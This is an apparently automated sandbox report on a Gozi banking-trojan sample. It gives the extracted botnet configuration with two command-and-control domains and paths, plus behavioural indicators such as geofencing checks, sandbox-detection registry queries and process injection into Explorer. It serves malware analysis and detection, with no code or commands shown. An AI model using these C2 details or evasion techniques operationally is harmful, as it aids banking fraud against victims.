gozi | hxxps://bazaar[.]abuse[.]ch/download/911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4/

Analysis

max time kernel
328s
max time network
309s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
08-10-2023 18:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://bazaar.abuse.ch/download/911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4/

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

http://igrovdow.com

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation mshta.exe
Executes dropped EXE 1 IoCs

Processes:

911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exe

pid process

5784 911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4200 set thread context of 3164	4200	powershell.exe	Explorer.EXE
PID 3164 set thread context of 3740	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 set thread context of 3956	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 set thread context of 4828	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 set thread context of 1124	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 set thread context of 5716	3164	Explorer.EXE	cmd.exe
PID 3164 set thread context of 4188	3164	Explorer.EXE	cmd.exe
PID 5716 set thread context of 2684	5716	cmd.exe	PING.EXE
PID 3164 set thread context of 2208	3164	Explorer.EXE	taskmgr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5820 5784 WerFault.exe 911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exe

pid	pid_target	process	target process
5820	5784	WerFault.exe	911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE

Modifies registry class 39 IoCs

Processes:

taskmgr.exeExplorer.EXEfirefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings	taskmgr.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\NodeSlot = "3"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 = 5a0031000000000048574092100053797374656d33320000420009000400efbe874f7748485740922e000000b90c000000000100000000000000000000000000000017f77300530079007300740065006d0033003200000018000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 = 56003100000000002f574035100057696e646f777300400009000400efbe874f7748485741922e000000000600000000010000000000000000000000000000007fa41301570069006e0064006f0077007300000016000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE

NTFS ADS 1 IoCs

Processes:

firefox.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.zip:Zone.Identifier	firefox.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2684 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Explorer.EXE

pid process

3164 Explorer.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

2684 PING.EXE

pid	process
2684	PING.EXE

pid	process
3164	Explorer.EXE

pid	process
2684	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exepowershell.exeExplorer.EXE

pid	process
5784	911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exe
5784	911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4.exe
4200	powershell.exe
4200	powershell.exe
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

7zFM.exeExplorer.EXE

pid process

2596 7zFM.exe
3164 Explorer.EXE

pid	process
2596	7zFM.exe
3164	Explorer.EXE

Suspicious behavior: MapViewOfSection 9 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid	process
4200	powershell.exe
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
5716	cmd.exe
3164	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

firefox.exe7zFM.exepowershell.exeExplorer.EXEtaskmgr.exe

description	pid	process
Token: SeDebugPrivilege	1900	firefox.exe
Token: SeDebugPrivilege	1900	firefox.exe
Token: SeDebugPrivilege	1900	firefox.exe
Token: SeRestorePrivilege	2596	7zFM.exe
Token: 35	2596	7zFM.exe
Token: SeSecurityPrivilege	2596	7zFM.exe
Token: SeDebugPrivilege	4200	powershell.exe
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeDebugPrivilege	2208	taskmgr.exe
Token: SeSystemProfilePrivilege	2208	taskmgr.exe
Token: SeCreateGlobalPrivilege	2208	taskmgr.exe
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

firefox.exe7zFM.exetaskmgr.exeExplorer.EXE

pid	process
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
2596	7zFM.exe
2596	7zFM.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
3164	Explorer.EXE
3164	Explorer.EXE
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
3164	Explorer.EXE
2208	taskmgr.exe
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
2208	taskmgr.exe
2208	taskmgr.exe
3164	Explorer.EXE
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

firefox.exetaskmgr.exeExplorer.EXE

pid	process
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
3164	Explorer.EXE
2208	taskmgr.exe
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
2208	taskmgr.exe
2208	taskmgr.exe
3164	Explorer.EXE
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
2208	taskmgr.exe
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE

Suspicious use of SetWindowsHookEx 17 IoCs

Processes:

firefox.exeExplorer.EXE

pid	process
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
1900	firefox.exe
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

firefox.exefirefox.exe

description	pid	process	target process
PID 2516 wrote to memory of 1900	2516	firefox.exe	firefox.exe
PID 2516 wrote to memory of 1900	2516	firefox.exe	firefox.exe
PID 2516 wrote to memory of 1900	2516	firefox.exe	firefox.exe
PID 2516 wrote to memory of 1900	2516	firefox.exe	firefox.exe
PID 2516 wrote to memory of 1900	2516	firefox.exe	firefox.exe
PID 2516 wrote to memory of 1900	2516	firefox.exe	firefox.exe
PID 2516 wrote to memory of 1900	2516	firefox.exe	firefox.exe
PID 2516 wrote to memory of 1900	2516	firefox.exe	firefox.exe
PID 2516 wrote to memory of 1900	2516	firefox.exe	firefox.exe
PID 2516 wrote to memory of 1900	2516	firefox.exe	firefox.exe
PID 2516 wrote to memory of 1900	2516	firefox.exe	firefox.exe
PID 1900 wrote to memory of 860	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 860	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
PID 1900 wrote to memory of 1264	1900	firefox.exe	firefox.exe
